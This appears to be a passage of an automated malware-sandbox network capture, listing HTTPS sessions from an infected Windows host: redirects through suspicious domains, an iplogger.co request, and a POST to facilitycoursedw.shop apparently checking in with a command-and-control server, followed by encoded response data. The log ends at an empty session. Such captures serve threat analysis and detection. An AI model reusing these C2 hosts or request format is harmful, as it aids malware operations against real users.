2024-06-23 22:10:35 UTC	665	OUT	GET /Website.php HTTP/1.1 Host: starjod.xyz Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-06-23 22:10:35 UTC	646	IN	HTTP/1.1 302 Found Server: hcdn Date: Sun, 23 Jun 2024 22:10:35 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: close x-powered-by: PHP/8.1.27 location: https://www.google.com/url?q=https%3A%2F%2Ffindalltechs.xyz%2Fboosting-your-credit-score-a-guide-to-securing-better-loan-rates%2F&sa=D&sntz=1&usg=AOvVaw2c6cV2MOm3tF_tzByuUNer cache-control: no-cache, no-store, must-revalidate, max-age=0 platform: hostinger content-security-policy: upgrade-insecure-requests alt-svc: h3=":443"; ma=86400 x-hcdn-request-id: 465e9ff896842850dca480e0425aa7dc-bos-edge1 x-hcdn-cache-status: MISS x-hcdn-upstream-rt: 0.193

Session ID	Source IP	Source Port	Destination IP	Destination Port
15	192.168.2.5	49776	172.67.144.241	443

Timestamp	Bytes transferred	Direction	Data
2024-06-23 22:10:35 UTC	269	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 58 Host: facilitycoursedw.shop
2024-06-23 22:10:35 UTC	58	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 66 75 4f 4c 4d 62 2d 2d 70 61 6c 70 61 74 69 6e 65 26 6a 3d 64 65 66 61 75 6c 74 Data Ascii: act=recive_message&ver=4.0&lid=fuOLMb--palpatine&j=default
2024-06-23 22:10:36 UTC	806	IN	HTTP/1.1 200 OK Date: Sun, 23 Jun 2024 22:10:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ak5r1t7cvhqvlhte24r4805e8q; expires=Thu, 17-Oct-2024 15:57:14 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=drHVC6Zw4yxtE2SeIjsCG6PxiuQPZ8NSeWqmbSC2f5o4FidbQPhhZMEqB2HBwV9EnOtD9%2F0D70ZXUNqUao15LwTl4PzCjr14agZJeVgE4Ie%2BOM4vCa%2BQXKtF0WCOXZY3sbL6lWkjdkA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8987cf1b98ef4294-EWR alt-svc: h3=":443"; ma=86400
2024-06-23 22:10:36 UTC	563	IN	Data Raw: 33 62 35 35 0d 0a 70 69 39 44 30 4e 47 50 5a 4b 4f 51 71 52 42 30 35 6c 4c 6f 2f 74 63 71 4b 6d 65 76 51 68 63 55 47 4f 75 62 6b 64 4a 6a 35 73 33 64 4a 55 72 79 70 36 31 65 67 36 53 46 47 6e 33 45 49 59 33 63 37 51 70 65 46 64 6f 6e 4f 78 34 52 79 66 72 31 38 46 6e 47 71 38 64 44 4d 4c 58 39 68 57 32 42 39 64 45 79 54 73 59 4a 34 76 66 65 55 51 70 46 79 69 77 31 4c 6a 6a 4a 2f 76 75 77 41 6f 71 76 78 30 51 73 6f 4c 33 73 44 4d 2f 33 77 58 55 58 67 6a 4f 45 6b 37 4a 50 54 77 62 46 4c 48 35 35 63 49 61 35 76 66 4a 42 67 37 65 45 46 57 50 79 6e 4f 6f 51 77 74 33 49 59 78 2f 45 63 70 58 53 33 53 4d 6a 48 49 39 67 63 6e 6f 36 30 62 75 7a 73 77 61 45 6f 63 42 4c 4b 4c 69 35 35 77 44 41 39 4d 4e 67 48 59 41 36 67 4a 79 7a 51 30 55 4e 33 79 35 78 66 6e 61 49 39 Data Ascii: 3b55pi9D0NGPZKOQqRB05lLo/tcqKmevQhcUGOubkdJj5s3dJUryp61eg6SFGn3EIY3c7QpeFdonOx4Ryfr18FnGq8dDMLX9hW2B9dEyTsYJ4vfeUQpFyiw1LjjJ/vuwAoqvx0QsoL3sDM/3wXUXgjOEk7JPTwbFLH55cIa5vfJBg7eEFWPynOoQwt3IYx/EcpXS3SMjHI9gcno60buzswaEocBLKLi55wDA9MNgHYA6gJyzQ0UN3y5xfnaI9
2024-06-23 22:10:36 UTC	1369	IN	Data Raw: 32 47 32 73 75 6b 48 78 66 7a 46 64 68 71 43 50 6f 65 54 73 30 4a 49 41 73 63 6f 66 58 64 33 67 76 62 7a 74 51 79 41 71 63 68 4d 4a 50 4c 39 72 30 62 47 36 6f 73 71 56 4d 51 65 6a 5a 2b 6e 43 6e 30 47 77 79 35 79 59 44 72 4c 35 72 33 59 61 75 2b 32 68 67 30 6d 76 76 4f 31 52 49 48 38 7a 6e 30 45 68 53 4b 50 6b 71 64 45 54 51 50 41 49 33 74 32 66 34 37 30 2f 62 59 47 68 36 66 41 54 43 2b 2b 75 65 34 43 77 72 4b 46 4d 46 61 44 4b 4d 72 45 39 77 68 35 42 73 6b 6e 5a 33 56 30 79 62 76 73 2f 6d 6e 76 78 4e 30 50 59 62 57 2f 72 56 36 44 73 73 46 30 47 34 30 37 6a 5a 53 35 57 6b 4d 4b 7a 69 6c 79 63 48 43 4b 38 66 6d 32 44 34 57 6f 77 55 6f 7a 76 4c 6a 67 42 63 76 30 69 7a 78 55 78 44 65 53 33 4f 30 4b 43 43 76 4f 4d 57 4e 45 65 5a 6a 6f 73 2f 49 65 79 73 65 76 Data Ascii: 2G2sukHxfzFdhqCPoeTs0JIAscofXd3gvbztQyAqchMJPL9r0bG6osqVMQejZ+nCn0Gwy5yYDrL5r3Yau+2hg0mvvO1RIH8zn0EhSKPkqdETQPAI3t2f470/bYGh6fATC++ue4CwrKFMFaDKMrE9wh5BsknZ3V0ybvs/mnvxN0PYbW/rV6DssF0G407jZS5WkMKzilycHCK8fm2D4WowUozvLjgBcv0izxUxDeS3O0KCCvOMWNEeZjos/Ieysev
2024-06-23 22:10:36 UTC	1369	IN	Data Raw: 33 6a 41 64 65 79 69 57 31 59 37 46 76 68 68 66 63 49 54 77 6d 4e 65 44 63 32 64 6f 44 35 2b 4c 6f 46 68 4b 6a 4a 53 43 4b 31 73 4f 41 42 79 2f 7a 4d 64 68 71 4e 50 59 79 63 73 6b 78 4e 46 38 67 70 65 58 6f 36 78 37 75 7a 74 78 6e 45 39 34 59 4e 44 72 57 6c 37 69 6e 43 34 38 49 79 56 4a 74 2b 34 76 66 65 55 51 70 46 79 69 77 31 4c 6a 6a 4a 2f 76 61 34 43 6f 4b 6e 78 46 38 6b 76 4c 6a 73 44 4d 66 7a 78 6e 34 51 68 44 47 4b 6d 72 6c 49 54 77 4c 66 4d 6e 42 77 61 49 4f 35 76 66 4a 42 67 37 65 45 46 57 50 79 68 66 30 52 30 4f 53 4a 52 78 57 4b 50 6f 32 4b 39 51 70 58 53 36 56 4c 48 6d 38 34 79 66 37 2f 38 46 6e 47 37 38 39 4e 4c 62 57 37 36 77 4c 4a 2f 63 52 37 42 49 55 38 68 49 36 79 53 45 45 4c 77 69 78 38 65 33 32 45 38 76 6d 39 42 59 4f 75 68 41 4e 6a 38 Data Ascii: 3jAdeyiW1Y7FvhhfcITwmNeDc2doD5+LoFhKjJSCK1sOABy/zMdhqNPYycskxNF8gpeXo6x7uztxnE94YNDrWl7inC48IyVJt+4vfeUQpFyiw1LjjJ/va4CoKnxF8kvLjsDMfzxn4QhDGKmrlITwLfMnBwaIO5vfJBg7eEFWPyhf0R0OSJRxWKPo2K9QpXS6VLHm84yf7/8FnG789NLbW76wLJ/cR7BIU8hI6ySEELwix8e32E8vm9BYOuhANj8
2024-06-23 22:10:36 UTC	1369	IN	Data Raw: 48 2b 73 78 38 47 34 38 32 67 5a 75 79 54 6b 55 4e 77 43 56 32 64 33 36 44 36 2f 43 37 43 34 6d 6c 68 41 4e 6a 38 72 54 31 52 70 6d 77 69 31 55 61 72 53 43 52 6a 71 4d 49 43 68 71 44 53 42 34 64 59 38 75 35 39 4c 78 42 33 4f 32 45 54 69 36 37 76 4f 55 4f 7a 76 33 50 66 42 43 43 50 59 2b 54 76 31 70 41 43 38 41 72 65 6e 31 6f 69 66 54 33 76 41 57 4d 70 4d 34 4e 62 2f 44 7a 36 68 36 42 71 6f 6b 79 49 34 6b 2f 69 70 2b 6a 43 41 6f 61 67 30 67 65 48 57 50 4c 75 66 53 38 51 64 7a 74 68 45 45 76 73 72 7a 68 43 73 72 36 79 6e 34 59 67 7a 57 44 6c 4c 31 61 53 51 48 46 49 58 74 35 65 34 33 38 39 72 51 47 67 4b 6e 4c 44 57 2f 77 38 2b 6f 65 67 61 71 4a 4d 6a 6d 6a 42 63 69 39 6a 77 67 4b 47 6f 4e 49 48 68 31 6a 79 37 6e 30 76 45 48 63 37 59 52 42 49 72 36 37 34 67 Data Ascii: H+sx8G482gZuyTkUNwCV2d36D6/C7C4mlhANj8rT1Rpmwi1UarSCRjqMIChqDSB4dY8u59LxB3O2ETi67vOUOzv3PfBCCPY+Tv1pAC8Aren1oifT3vAWMpM4Nb/Dz6h6BqokyI4k/ip+jCAoag0geHWPLufS8QdzthEEvsrzhCsr6yn4YgzWDlL1aSQHFIXt5e4389rQGgKnLDW/w8+oegaqJMjmjBci9jwgKGoNIHh1jy7n0vEHc7YRBIr674g
2024-06-23 22:10:36 UTC	1369	IN	Data Raw: 64 42 43 46 4d 34 2b 66 73 45 35 4a 42 63 45 71 63 6e 35 77 68 2f 54 31 74 41 65 43 37 34 6f 50 59 62 57 72 72 56 36 44 73 76 6c 2f 47 49 30 7a 6a 4a 47 6a 59 48 6c 46 6a 7a 38 37 48 68 48 69 34 4c 48 77 42 6f 6a 76 6e 41 39 68 74 72 6a 6c 43 73 54 36 7a 6e 4d 65 6a 6a 69 46 6b 36 64 4a 52 77 7a 4b 4b 33 68 35 64 49 7a 33 34 62 63 4b 6a 36 66 4e 51 79 66 79 2f 61 39 47 78 75 71 4c 4b 6c 54 45 42 6f 6d 53 76 6c 6c 48 42 73 46 67 4e 32 6b 30 34 5a 4b 59 71 55 50 45 71 4d 67 4e 65 66 44 7a 35 77 33 46 38 63 39 33 47 59 55 78 6a 49 36 79 51 56 6f 4c 77 43 39 39 66 6e 4f 49 2f 66 61 39 42 34 69 6c 78 55 6f 76 76 4c 75 74 53 49 4f 79 7a 47 70 57 33 48 4c 4b 76 61 56 54 57 68 50 41 41 58 68 35 4f 73 76 6d 76 64 68 71 37 37 61 47 44 53 61 2b 38 37 56 45 67 66 76 Data Ascii: dBCFM4+fsE5JBcEqcn5wh/T1tAeC74oPYbWrrV6Dsvl/GI0zjJGjYHlFjz87HhHi4LHwBojvnA9htrjlCsT6znMejjiFk6dJRwzKK3h5dIz34bcKj6fNQyfy/a9GxuqLKlTEBomSvllHBsFgN2k04ZKYqUPEqMgNefDz5w3F8c93GYUxjI6yQVoLwC99fnOI/fa9B4ilxUovvLutSIOyzGpW3HLKvaVTWhPAAXh5Osvmvdhq77aGDSa+87VEgfv
2024-06-23 22:10:36 UTC	1369	IN	Data Raw: 6e 43 45 6c 62 52 41 52 67 6e 46 4a 47 64 32 63 59 44 32 38 72 38 42 68 36 37 4f 52 54 4f 30 73 2b 59 4f 78 76 72 50 66 41 53 46 50 38 72 53 39 77 68 50 48 59 31 34 4e 7a 5a 4c 6e 2f 37 30 76 30 4f 74 71 4e 39 4d 4b 37 47 34 34 55 61 44 37 59 55 61 66 65 38 70 79 4e 79 79 52 41 68 64 6a 32 42 34 65 6e 65 4e 36 2f 2b 77 41 59 32 6f 7a 6c 38 75 76 62 37 75 42 73 54 67 79 6d 41 5a 6a 7a 57 4a 6d 4c 70 48 52 41 33 48 59 44 73 30 4f 6f 37 68 73 2b 68 44 78 49 50 48 58 43 76 77 6c 50 63 51 78 76 37 61 65 52 75 49 63 4d 69 44 2b 79 41 6a 62 74 52 69 4e 58 46 32 79 61 47 78 38 41 47 46 6f 74 5a 49 49 4c 69 35 34 41 37 4f 39 38 35 39 45 6f 41 37 68 49 36 37 52 30 67 44 78 69 46 77 64 58 47 44 39 2f 71 69 51 63 72 74 68 45 6f 35 38 75 75 76 52 75 76 70 79 6e 38 61 Data Ascii: nCElbRARgnFJGd2cYD28r8Bh67ORTO0s+YOxvrPfASFP8rS9whPHY14NzZLn/70v0OtqN9MK7G44UaD7YUafe8pyNyyRAhdj2B4eneN6/+wAY2ozl8uvb7uBsTgymAZjzWJmLpHRA3HYDs0Oo7hs+hDxIPHXCvwlPcQxv7aeRuIcMiD+yAjbtRiNXF2yaGx8AGFotZIILi54A7O9859EoA7hI67R0gDxiFwdXGD9/qiQcrthEo58uuvRuvpyn8a
2024-06-23 22:10:36 UTC	1369	IN	Data Raw: 65 39 53 30 59 4e 78 43 42 37 64 6e 75 45 2b 62 50 2b 51 38 53 6f 33 41 31 35 38 50 50 49 4a 64 62 6b 77 54 41 31 6b 79 61 41 6d 37 6c 65 51 77 54 4f 4e 6e 68 6d 4f 73 76 6d 76 64 68 71 37 37 61 47 44 53 61 2b 38 37 56 45 67 66 6e 45 66 42 75 50 4e 49 4f 5a 76 55 74 4e 41 4d 63 73 65 58 64 79 67 50 50 32 74 51 65 4f 72 4d 70 43 49 4c 36 33 35 41 6a 49 73 6f 55 77 56 6f 4d 6f 79 73 54 33 43 48 34 56 79 6a 68 34 5a 6a 69 37 2b 75 4b 68 46 49 6d 2f 77 67 38 4f 73 62 2f 75 41 38 62 69 69 7a 41 4a 79 6c 6a 68 39 36 77 4b 43 41 4c 42 59 43 30 30 4f 6f 6e 39 2f 37 4d 47 69 71 44 4a 51 69 61 35 76 4f 63 49 30 2f 33 4f 65 68 71 4d 50 5a 69 57 76 31 70 42 44 4d 41 75 66 57 52 35 79 62 65 78 38 41 61 63 37 35 77 50 59 59 43 35 37 67 72 58 2f 38 51 79 56 4a 74 2b 34 Data Ascii: e9S0YNxCB7dnuE+bP+Q8So3A158PPIJdbkwTA1kyaAm7leQwTONnhmOsvmvdhq77aGDSa+87VEgfnEfBuPNIOZvUtNAMcseXdygPP2tQeOrMpCIL635AjIsoUwVoMoysT3CH4Vyjh4Zji7+uKhFIm/wg8Osb/uA8biizAJyljh96wKCALBYC00Oon9/7MGiqDJQia5vOcI0/3OehqMPZiWv1pBDMAufWR5ybex8Aac75wPYYC57grX/8QyVJt+4
2024-06-23 22:10:36 UTC	1369	IN	Data Raw: 46 4a 4d 41 72 65 58 74 31 67 72 6d 39 32 47 72 76 78 49 52 4c 59 65 72 78 76 55 69 70 6d 61 41 5a 56 6f 41 68 79 73 54 33 47 42 70 65 6d 48 4d 69 4a 69 6a 68 6b 70 69 76 54 2b 7a 45 72 31 52 4a 32 64 69 47 52 74 65 79 6b 7a 42 45 79 6c 6a 68 39 39 34 49 57 6b 57 56 59 6a 55 78 65 5a 76 72 39 62 4d 58 68 2b 6a 36 63 77 4b 6c 70 65 63 64 67 39 54 4d 59 78 2b 53 50 5a 69 69 69 32 5a 46 42 4d 34 75 4e 30 64 73 68 4f 6e 77 74 51 61 36 6b 63 70 4b 4e 62 57 39 36 77 61 42 76 4b 4d 5a 66 65 39 77 68 64 7a 74 43 6e 46 46 68 57 42 4b 4f 42 4c 69 6b 70 6a 77 47 63 54 33 68 67 30 55 73 62 33 6a 41 64 66 6a 68 6c 45 42 6b 6a 71 52 33 70 4e 50 57 51 7a 62 4c 57 63 32 4e 4f 47 53 6d 4e 74 42 67 75 2b 63 44 33 48 38 32 34 5a 74 71 72 4c 50 59 31 62 63 63 74 72 4f 37 68 Data Ascii: FJMAreXt1grm92GrvxIRLYerxvUipmaAZVoAhysT3GBpemHMiJijhkpivT+zEr1RJ2diGRteykzBEyljh994IWkWVYjUxeZvr9bMXh+j6cwKlpecdg9TMYx+SPZiii2ZFBM4uN0dshOnwtQa6kcpKNbW96waBvKMZfe9whdztCnFFhWBKOBLikpjwGcT3hg0Usb3jAdfjhlEBkjqR3pNPWQzbLWc2NOGSmNtBgu+cD3H824ZtqrLPY1bcctrO7h
2024-06-23 22:10:36 UTC	1369	IN	Data Raw: 59 45 6f 34 45 75 4b 53 6d 50 41 5a 78 50 65 47 44 52 53 78 76 65 4d 42 31 2b 4f 47 56 52 69 44 4d 5a 79 4d 75 45 52 70 42 74 77 71 4e 54 67 53 34 70 4b 59 38 41 66 45 39 34 59 66 62 39 72 59 68 6d 32 42 39 74 6f 79 54 73 5a 67 32 4d 66 67 47 78 39 56 6e 30 67 65 48 57 58 48 6b 5a 6a 62 47 4f 7a 45 72 79 5a 68 70 50 4f 31 52 4a 4f 38 6f 78 6c 39 37 33 43 59 33 4f 30 4b 43 45 4c 4f 4d 6d 64 77 65 5a 2f 36 74 49 34 2f 6f 62 6a 48 58 53 65 78 6a 64 4d 74 7a 66 54 4d 61 42 47 43 46 71 72 63 2b 79 41 6a 62 71 5a 67 65 6a 59 69 79 38 43 7a 2b 45 47 37 34 61 77 6d 53 74 6e 7a 39 55 61 5a 73 49 74 48 46 59 6f 2b 6a 59 71 6b 42 57 30 53 7a 6a 42 7a 64 54 72 48 6b 5a 6a 62 61 73 53 70 68 42 56 6a 34 76 32 46 62 61 71 5a 69 33 59 48 78 47 6a 49 7a 4f 63 54 48 56 61 Data Ascii: YEo4EuKSmPAZxPeGDRSxveMB1+OGVRiDMZyMuERpBtwqNTgS4pKY8AfE94Yfb9rYhm2B9toyTsZg2MfgGx9Vn0geHWXHkZjbGOzEryZhpPO1RJO8oxl973CY3O0KCELOMmdweZ/6tI4/objHXSexjdMtzfTMaBGCFqrc+yAjbqZgejYiy8Cz+EG74awmStnz9UaZsItHFYo+jYqkBW0SzjBzdTrHkZjbasSphBVj4v2FbaqZi3YHxGjIzOcTHVa

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.5	49772	172.67.167.249	443	8108	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-06-23 22:10:35 UTC	637	OUT	GET /favicon.ico HTTP/1.1 Host: iplogger.co Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://iplogger.co/1lLub Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: 54493797137263905=2; clhf03028ja=8.46.123.33
2024-06-23 22:10:35 UTC	869	IN	HTTP/1.1 200 OK Date: Sun, 23 Jun 2024 22:10:35 GMT Content-Type: image/x-icon Content-Length: 2833 Connection: close last-modified: Tue, 07 Jun 2022 11:44:38 GMT etag: "629f3a26-b11" strict-transport-security: max-age=604800 strict-transport-security: max-age=31536000 content-security-policy: img-src https: data:; upgrade-insecure-requests x-frame-options: SAMEORIGIN Cache-Control: max-age=14400 CF-Cache-Status: REVALIDATED Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DPqVhTc23dR2NGDv58z22jJ0gMGUHZUfRvC4eytyM4TbEyC7vRYx6y2Mpzsh3KeeE%2BEdKfrfOOa%2BZRWXr8fyBcJxKzHTWPixg%2F9i7DYJkltftxz6LynGZFW2FpQWJA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8987cf1bcbd18c8a-EWR alt-svc: h3=":443"; ma=86400
2024-06-23 22:10:35 UTC	500	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 40 00 00 00 40 08 06 00 00 00 aa 69 71 de 00 00 0a d8 49 44 41 54 78 9c dd 9b 7f 8c db 65 1d c7 5f 4f 73 6d 97 cb 85 bb 2c 75 59 96 73 59 49 9d 77 c7 24 c8 0c d1 8d 8e 1f 0a 0c b0 18 98 3a 56 6a 44 c6 cf 21 82 80 01 6f 25 86 ac 14 f9 35 24 82 0a a2 a0 d6 ca cf 09 96 20 28 99 93 3b 7e 38 06 22 ce eb c4 ba ce cb b2 10 68 2e bb cb 72 b9 5e 2f 7d fc e3 f3 7c d7 de 71 6d bf 4f af 77 18 df 49 f3 6d da ef e7 f9 3e cf e7 79 3e bf 3f 5f c5 02 c1 9b ce 3b 5f 3d c0 62 80 52 34 58 88 e5 34 c0 32 e0 88 f9 94 53 21 b5 50 d3 a2 6d 3e 07 f7 a6 f3 1d c0 2a 60 0d b0 1a e8 01 96 03 ed 40 1a b8 cc cc e1 4f 08 13 c6 80 5c 2c a7 f7 01 6f 00 83 40 2e 15 52 53 f3 35 c7 96 33 c0 9b ce b7 03 eb 81 4d c0 a9 40 a0 c6 ad 9e aa Data Ascii: PNGIHDR@@iqIDATxe_Osm,uYsYIw$:VjD!o%5$ (;~8"h.r^/}\|qmOwIm>y>?_;_=bR4X42S!Pm>*`@O\,o@.RS53M@
2024-06-23 22:10:35 UTC	1369	IN	Data Raw: be 5f 8f 98 b7 56 63 ce 26 b8 0e 16 01 8f c7 72 7a 4d a3 1b 1b 39 42 e7 01 b7 b7 64 4a 70 18 d8 03 bc 05 fc cb 7c 07 f1 f6 ae 40 dc e4 4f 00 9f 05 8e a7 22 6a 65 e0 90 a1 6f 47 4c a0 1b 31 ec 00 9e 8c e5 f4 e7 52 21 35 5c eb a6 9a 51 87 37 9d 0f 01 7f c1 04 2e 4d 62 02 78 1e 78 04 d8 05 1c 29 45 83 75 09 62 39 ed 41 64 f9 3c a0 0b 78 0a 38 08 4c 21 a7 a6 0b 38 13 b8 06 61 56 23 bc 0a 7c 3e 15 52 13 b3 fd 39 2b 03 bc e9 bc 0f 09 50 1a 1e a1 1a 98 04 7e 09 dc 5e 8a 06 f7 3b 3f fa 23 71 90 e3 b9 14 d9 c9 0e 64 87 47 80 61 60 a4 98 49 b8 f2 f5 63 39 dd 06 5c 0a dc 43 63 27 2c 09 6c 9d 2d ca ac c5 80 eb cd c0 cd e0 6d e4 48 ef 2e 45 83 ce a2 bb 81 0b 80 73 11 73 b5 98 e9 3a a0 6c 3e c3 c0 d5 c5 4c e2 05 00 ad 75 1b b2 db 67 23 51 e4 08 30 00 3c a5 94 1a 33 9a Data Ascii: _Vc&rzM9BdJp\|@O"jeoGL1R!5\Q7.Mbxx)Eub9Ad<x8L!8aV#\|>R9+P~^;?#qdGa`Ic9\Cc',l-mH.Ess:l>Lug#Q0<3
2024-06-23 22:10:35 UTC	964	IN	Data Raw: b8 34 f6 20 d2 a1 69 83 47 81 cd a6 36 70 2c 52 1b 08 59 8e e1 16 cf 00 17 15 33 89 f1 64 41 2f 46 8a 30 8e f3 f3 0e 70 03 b0 b3 3f a0 ca 00 b1 9c 3e 09 29 f2 9e 5c 35 c6 86 54 48 cd 7a 02 40 7a 80 6c cd da c5 c0 ad 46 1f ec 07 c2 08 97 5b 89 32 f0 03 60 a3 59 7c 07 f0 24 d3 3d bf e3 11 e6 3f 99 2c e8 95 c9 82 26 15 52 bb 81 53 80 8b 90 5d 1f 02 9e ab 1e 78 26 03 f6 21 b6 dd 16 97 63 62 84 62 26 f1 1e 70 16 92 d9 6d 45 3b eb 7e e0 4b c0 b7 8b 99 c4 64 b2 a0 bb 80 67 99 bd 4d cf 83 e4 fc ff 0a dc 9e 2c e8 2e a3 1f d2 48 0a 6c 93 c9 1c 1d c5 6c e5 f1 15 88 97 e4 36 de 9f 00 ce 2e 45 83 bb 7a 07 46 3d 80 2f 1b ee 9c 00 30 85 d2 9b 90 82 ab 6d b9 fd 00 f0 43 e0 a1 62 26 71 04 20 59 d0 3d 88 b2 76 eb f2 1e 44 aa d4 a9 fe c0 ec 4d d6 b5 1a 24 6e c6 5d 6f 90 d3 Data Ascii: 4 iG6p,RY3dA/F0p?>)\5THz@zlF[2`Y\|$=?,&RS]x&!cbb&pmE;~KdgM,.Hll6.EzF=/0mCb&q Y=vDM$n]o

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.5	49755	142.250.185.132	443	8108	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-06-23 22:10:35 UTC	808	OUT	GET /url?q=https%3A%2F%2Ffindalltechs.xyz%2Fboosting-your-credit-score-a-guide-to-securing-better-loan-rates%2F&sa=D&sntz=1&usg=AOvVaw2c6cV2MOm3tF_tzByuUNer HTTP/1.1 Host: www.google.com Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-06-23 22:10:35 UTC	831	IN	HTTP/1.1 200 OK Location: https://findalltechs.xyz/boosting-your-credit-score-a-guide-to-securing-better-loan-rates/ Cache-Control: private Content-Type: text/html; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Permissions-Policy: unload=() P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Date: Sun, 23 Jun 2024 22:10:35 GMT Server: gws Content-Length: 526 X-XSS-Protection: 0 Expires: Sun, 23 Jun 2024 22:10:35 GMT Set-Cookie: NID=515=vwZtE9oRARNFtHeFG-qXUCQgRVeN6nYymMTkjQ8idS-oq40gSK3ORl3fufQCQ1pwUJarxPE6qXei_IGYRnGoqannW1TXtTnyOJqjlx-hEZDKXA47CEfVeowsLnTF0H2fRQhQRx8mTaz35IMwSdg60kE3GNzhW4yJr07PJG79Azo; expires=Mon, 23-Dec-2024 22:10:35 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-06-23 22:10:35 UTC	526	IN	Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 52 65 64 69 72 65 63 74 69 6e 67 3c 2f 54 49 54 4c 45 3e 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 31 3b 20 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 66 69 6e 64 61 6c 6c 74 65 63 68 73 2e 78 79 7a 2f 62 6f 6f 73 74 69 6e 67 2d 79 6f 75 72 2d 63 72 65 64 69 74 2d 73 63 6f 72 65 2d 61 2d 67 75 69 64 65 2d 74 6f 2d 73 65 63 75 72 69 6e 67 2d 62 65 74 74 65 72 2d 6c 6f 61 6e 2d 72 61 74 65 73 2f 22 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>Redirecting</TITLE><META HTTP-EQUIV="refresh" content="1; url=https://findalltechs.xyz/boosting-your-credit-score-a-guide-to-securing-better-loan-rates/"></HEAD><BOD

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.5	49779	84.32.84.161	443	8108	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
